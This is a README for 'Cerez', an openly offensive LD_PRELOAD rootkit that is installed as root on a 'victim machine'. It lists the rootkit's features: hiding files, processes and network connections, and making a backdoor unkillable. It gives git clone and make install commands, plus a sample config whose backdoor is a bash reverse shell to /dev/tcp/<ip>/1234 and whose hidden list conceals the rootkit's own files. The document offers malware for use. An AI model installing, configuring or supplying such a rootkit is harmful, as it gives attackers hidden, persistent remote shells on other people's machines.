Cerez is a configurable userland LD_PRELOAD rootkit, by installing it
into /etc/ld.so.preload, you can preload it before every binary.
It can protect/hide your backdoor as well other files you want
hidden. It does so by overwriting syscalls and functions like open, unlinkat etc.
- β Hides files in the file system
- β Hides your backdoor in the process list
- β Hides connections in the network list
- β Makes your backdoor unkillable
- β Makes files unreadable
- β Makes files unwriteable
Warning
Don't forget to edit cerez.cfg before install
You can install it with apt on debian systems:
apt update && apt install build-essential libconfig-devTo install the rootkit on a victim machine run the following as ROOT:
git clone https://github.com/ngn13/cerez.git && cd cerez
make && make install
cd .. && rm -rf cerezConfiguration is (really) simple, in the backdoor section,
leave your backdoor/malicious command, this will be run by the rootkit everytime a program starts (if its not already running).
Your backdoor will be hidden in the process list. It will
be also unkillable.
In the hidden section, specify full paths for all the files that you want hidden.
backdoor = "bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'"
hidden = (
{ path = "/etc/cerez.cfg" },
{ path = "/etc/ld.so.preload" },
{ path = "/path/to/your/super/secret/file" }
);
To learn more about LD_PRELOAD rootkits, I highly recommend you read this
article.
I also left some comments in the loader.c so you can go ahead and read it.
You can also create an issue/PR if you are interested.